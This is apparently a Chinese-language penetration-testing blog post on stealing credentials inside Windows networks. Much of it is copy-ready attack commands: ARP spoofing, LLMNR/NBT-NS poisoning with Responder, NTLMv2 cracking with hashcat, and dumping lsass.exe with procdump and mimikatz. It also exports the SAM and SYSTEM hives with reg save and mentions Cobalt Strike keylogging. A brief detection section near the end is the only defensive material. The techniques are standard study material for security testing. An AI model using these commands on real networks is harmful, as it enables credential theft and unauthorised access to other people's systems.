中间人攻击

arp欺骗

首先开启kali的ip转发

echo 1 > /proc/sys/net/ipv4/ip_forward

点击开始扫描

查看扫描结果:

将要欺骗的主机add to target1,网关add to target2


点击arp poisoning进行arp欺骗

查看arp列表已经发现网关已经变成kali的ip

LLMNR/NBT-NS中毒

  • LLMNR和NetBIOS名称服务器广播:
    当DNS名称服务器请求失败时,Windows系统就会通过链路本地多播名称解析(LLMNR)和Net-BIOS名称服务(NBT-NS)试图在本地进行名称解析。
  • LLMNR和Netbios NS广播的缺点:
    当DNS名称无法解析的时候,客户端就会将未经认证的UDP广播到网络中,询问它是否为本地系统的名称。 事实上,该过程是未被认证的,并会广播到整个网络,从而允许网络上的任何机器响应并声称是目标机器。

下载并运行Responder.py
下载地址:https://github.com/lgandx/Responder

python Responder.py -i 172.16.253.104 -I eth0


启动Responder.py后,我们可以在域控输入一个任意一个错误的smb服务名


然后如果需要输入网络凭证,也可以随便输一个错误的。

  • 此时客户端会向DNS服务器取请求asd,然后DNS服务器返回没找到asd。然后客户端广播发送LLMNR/NBT-NS,攻击者会伪装成asd并且接受客户端发来的NTLMv2 hash,攻击完成。

在客户端广播不正确的服务器名称的几秒钟时间内,Responder.py就完成了对这个广播请求的应答,并将NTLMv2 hash保存在log文件夹下,名为SMB-NTLMv2-SSP-172.16.253.1.txt

接下来就是爆破hash,这里使用hashcat:

hashcat -m 5600 SMB-NTLMv2-SSP-172.16.253.1.txt word.txt --force

-m 5600表示爆破NTLMv2

SMB中继

  • SMB(Server Message Block)是一个协议名称,用它可以共享计算机之间的文件、打印机、串口等,通过 SMB 也可以远程访问服务器端的文件、打印机等共享资源。

SMB中继的前提是关闭smb 签名

获取浏览器保存的账户密码

  • chromepass
    使用chromepass可以查看chrome里保存的密码
  • WebBrowserPassView
    可显示以下 Web 浏览器存储的密码:Internet Explorer(版本 4.0 - 11.0)、Mozilla Firefox(所有版本)、Google Chrome、Safari 和 Opera。该工具可用于恢复您丢失/忘记的任何网站的密码,包括流行的网站,如 Facebook、雅虎、谷歌和 GMail,只要密码由您的网络浏览器存储。

用户输入劫持

键盘记录可以使用cobalt strike中的Log Keystrokes



然后就可以获取到用户输入的内容

网络捕获分析

SniffPass

SniffPass可以捕捉啦本机和局域网中(前提是你要在出口网关上运行SniffPass并进行嗅探)POP3、IMAP4、SMTP、FTP、和HTTP等协议的密码。以找回遗忘的FTP密码为例:

首先运行SniffPass,选择网卡后点击左上角的开始捕获,当域内其他人使用ftp登陆时,账号和密码就会自动被记录下来

账号转储

mimikatz

如果操作系统更新了KB2871997补丁或者版本高于windows server 2012,就无法再默认情况下使用mimikatz获取用户明文密码

#提升权限
privilege::debug

#抓取密码
sekurlsa::logonpasswords

Procdump+Mimikatz

对于有些机器可能不允许运行mimikatz,所以我们可以先用微软的官方工具Procdump导出lsass.exe
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
然后会生成一个lsass.dmp,将lsass.dmp下载到本地,然后用mimikatz进行读取
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

通过SAM和System文件抓取密码和Hash

首先利用注册表命令将目标机的sam或者system文件导出

reg save hklm\sam sam.hive
reg save hklm\system system.hive


然后将目标机上的sam.hivesystem.hive下载到本地,利用Mimikatz读取sam和system文件获取NTLMHash:

lsadump::sam /sam:sam.hive /system:system.hive


然后使用https://www.objectif-securite.ch/en/ophcrack网站或在cmd5进行爆破,

检测方法:

  1. 监视与 lsass.exe 交互的意外进程(例如Mimikatz)。通过打开进程、定位 LSA 密钥并解密存储凭证详细信息(包括 Kerberos 票证)的内存部分来访问 LSA 子系统服务 (LSASS) 进程。
  2. 启用审核 Kerberos 服务票证操作以记录 Kerberos TGS 服务票证请求。特别调查不规则的活动模式(例如:帐户在很短的时间内发出大量请求,事件 ID 4769)

Kerberos 票据

黄金票据和白银票据详见:https://yuaneu.ro/archives/pen3.html

最后修改:2021 年 09 月 23 日
如果觉得我的文章对你有用,请随意赞赏